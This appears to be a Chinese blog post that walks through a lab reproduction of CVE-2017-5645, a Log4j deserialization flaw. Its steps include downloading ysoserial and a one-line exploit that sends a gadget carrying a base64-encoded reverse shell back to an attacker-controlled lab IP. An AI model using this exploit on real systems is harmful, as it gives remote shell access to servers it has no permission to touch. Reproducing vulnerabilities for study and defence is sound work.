Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

漏洞复现环境搭建请参考

http://t.csdnimg.cn/MxmId

漏洞版本

Apache Log4j 2.8.2之前的2.x版本

漏洞验证

(1)开放端口4712

漏洞利用

(1)ysoserial工具获取

python 复制代码
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

(2)base64加密反弹shell命令

(3)攻击机开启监听

(4)执行命令获取反弹shell

python 复制代码
#执行错误原因是因为Kali的jdk版本与ysoserial版本不符,正常执行完该条语句即可反弹shell
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEyOC84ODg4IDA+JjEn}|{base64,-d}|{bash,-i}" | nc 192.168.88.128 4712
相关推荐
vip45123 分钟前
Linux 经典面试八股文
linux
大霞上仙26 分钟前
Ubuntu系统电脑没有WiFi适配器
linux·运维·电脑
weixin_4426434244 分钟前
推荐FileLink数据跨网摆渡系统 — 安全、高效的数据传输解决方案
服务器·网络·安全·filelink数据摆渡系统
星尘安全1 小时前
安全工程师入侵加密货币交易所获罪
安全·区块链·漏洞·加密货币
孤客网络科技工作室2 小时前
VMware 虚拟机使用教程及 Kali Linux 安装指南
linux·虚拟机·kali linux
颇有几分姿色2 小时前
深入理解 Linux 内存管理:free 命令详解
linux·运维·服务器
AndyFrank3 小时前
mac crontab 不能使用问题简记
linux·运维·macos
筱源源3 小时前
Kafka-linux环境部署
linux·kafka
newxtc3 小时前
【支付行业-支付系统架构及总结】
安全·支付宝·第三方支付·风控系统·财付通
newxtc4 小时前
【旷视科技-注册/登录安全分析报告】
人工智能·科技·安全·ddddocr